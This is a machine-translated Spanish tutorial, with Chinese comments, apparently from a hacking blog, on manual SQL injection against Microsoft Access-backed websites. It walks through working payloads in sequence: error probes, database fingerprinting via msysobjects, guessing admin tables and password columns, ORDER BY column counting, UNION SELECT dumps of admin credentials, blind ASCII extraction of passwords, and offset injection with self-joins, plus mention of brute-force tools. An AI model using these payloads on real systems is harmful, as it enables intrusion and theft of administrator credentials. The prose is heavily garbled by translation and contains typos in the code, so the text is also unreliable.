Novato primer contacto se inyecta con la mano a través de la etapa de principiante comenzará después de que el uso de herramientas, tales como alcanzar el nivel del Gran Dios se encuentra una gran cantidad de herramienta de cosas no puede hacer, este proceso se llama de nuevo a la naturaleza.
.Acceso introducir una base de datos
Microsoft Office Access es una publicación de sistemas de gestión de bases de datos relacionales de Microsoft. Combina el motor de base de datos Microsoft Jet y dos características de interfaz gráfica de usuario, es uno de los programas de Microsoft Office System. En cuanto a lo demás no me largo aliento desordenar. Sin embargo, se debe tener cuidado en su provecho (defectos) (manual divertido)
Los pasos básicos de .Acceso dos inyecciones
1. En primer lugar, después de la url además de un " '" con el fin de determinar si se inyecta (para ver si el principio se está dada por voluntad' en la investigación)
2.y 1 = 1 si los errores de observación, se juzga que no hay vulnerabilidad de inyección error
3.And 1 = 2 con la descripción de error para entrar, entrar con ninguna explicación adecuada (y, a veces se filtrarán)
4. Analizar el tipo de base de datos (originalmente debería - -, pero el efecto visual no es bueno, por lo que utiliza - a)
and exsits(select * from msysobjects)>0 -access数据库
and exsits(select * from sysobjects)>0 -sqlserver数据库
5. Determinar qué tabla de base de datos (nombre de la tabla mayoría de las empresas no van a ser tan simple de administración, ...)
and exists(select * from admin)
6. El juez de campo, por ejemplo, determinar si el campo de la contraseña (la mayor parte del nombre de la columna no es tan simple contraseña)
and exists(select password from admin)
7. Se determina la longitud de campo, en la pantalla es la presencia de normal, anormal no está presente, la prueba hasta la de la fecha, tales como el normal, 22, 23 se le da 22.
order by 20
order by 30
8. A continuación, de acuerdo con el orden de 5 Olvídalo (recuerde que debe hacer de él un error), entonces él se quejará, por ejemplo, un error en el 2 y 4
and 1=2 union select 1,2,3,4,5 from admin
and 1=2 union select 1,admin,3,password,5 from admin
9. episodio especial: Análisis de longitud de contraseña
and (select len(admin) from admin)=5 -如果返回正常说明管理员账户长度为5
and (select len(password) from admin)=5 -猜解管理员密码的长度是否为5
10. El episodio especial 2: una cuenta de administrador de datos primera sentencia, se determina mediante la determinación de código ASCII
and (select top 1 asc(mid(admin,1,1)) from admin)>100 -返回正常说明大于100
and (select top 1 asc(mid(admin,2,1)) from admin)>100 -账户的第二个数据
and (select top 1 asc(mid(password,1,1)) from admin)>100 -密码第一个数据
III. A continuación, puede una zona novato haciendo la tarea, y comenzar a usar los equipos (herramientas)
Aquí, estoy usando la herramienta de inyección ah D (es decir, el principio de la fuerza bruta) (continuación 5)
el uso de herramientas es muy simple, siempre y cuando la base de datos y luego determinar lo que se detecta en la línea. Por supuesto, no es la panacea, ya veces también no consigue el diccionario cabo, esta vez debemos cambiar ti. . .
Vamos a intentarlo Out Boy
uno Minite después ...
muchos años después…
Bueno, no sé por qué no puedo salir chico (no se preocupan por estos detalles).
En pocas palabras más de unas pocas herramientas para probar, siempre hay algún diccionario más avanzado, a continuación, probar (aunque algunos tienen un cortafuegos, la petición será prohibido demasiado a menudo)
11. La puesta en marcha de desplazamiento (ahora suponemos que la mesa ha sido juzgado, pero supongo nombre de la columna, uno por uno, esta vez con un anterior cambio *)
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,* from admin
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from admin
16 ha sido eliminado para volver a la normal de 3 y 15
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin
Hay una fórmula: longitud del campo - longitud final, es 22-16 = 6; 10 y 6 + 2 = 22; 6 4 + 3 = 22 (recuerda en la línea) **
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id)inner join admin as c on a.id=c.id)
Podemos combinar estos dos códigos miran la fórmula no se enteró de lo que la ley, pero no se puede escribir (de hecho, sobre todo porque yo no entendía)
- Él salió del resultado es una tabla de valores de esa columna al azar y el nombre no necesariamente
